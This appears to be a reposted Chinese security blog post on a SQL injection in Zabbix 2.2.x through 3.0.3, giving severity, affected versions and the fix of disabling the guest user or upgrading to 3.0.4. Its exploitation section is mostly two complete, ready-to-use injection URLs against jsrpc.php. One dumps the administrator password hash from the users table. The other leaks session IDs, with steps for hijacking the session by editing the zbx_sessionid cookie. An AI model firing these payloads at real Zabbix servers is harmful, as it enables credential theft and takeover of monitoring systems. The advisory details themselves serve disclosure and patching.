你的位置: 部落首页 Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 – SQL Injection
0

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 – SQL Injection

免费杀毒   2024年04月11日 6:40  

漏洞来源:http://seclists.org/fulldisclosure/2016/Aug/60

***成本:低

危害程度:高

利用条件: 需要guest用户权限(未登录用户都被设定为guest用户的访问权限)

影响范围:2.2.x / 2.4.x/ 3.0.0-3.0.3

修复建议:禁用guest用户或者升级到3.0.4

漏洞利用:

爆密码

sanr.com//jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and updatexml(1,concat(0x3a,(select passwd from .users limit 0,1)),1))%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1

输出结果,如下表示漏洞存在:

输出结果,如下表示禁用guest:

爆sessionid(在密码破解不了情况下 可以使用session欺骗)

需要取掉爆出来sessionid前面的数字1,在进行修改zbx_sessionid的值。

sanr.com/zabbix/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(sessionid,0x7e,userid,0x7e,status) from sessions where status=0 and userid=1 LIMIT 0,1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

zabbix具体版号查看

2.x版本

3.x版本

域名注册
购买VPS主机

您或许对下面这些文章有兴趣:                    本月吐槽辛苦排行榜

小编
TA的专栏:  |   小编 的博客    |    我要投稿
关于本文的作者
本文标签:, ,
所属分类:免费杀毒
看贴要回贴有N种理由!看帖不回贴的后果你懂得的!


评论内容 (*必填):
表情插代码粗体斜体删除线
(Ctrl + Enter提交)   

部落快速搜索栏

各类专题梳理

网站导航栏

X
返回顶部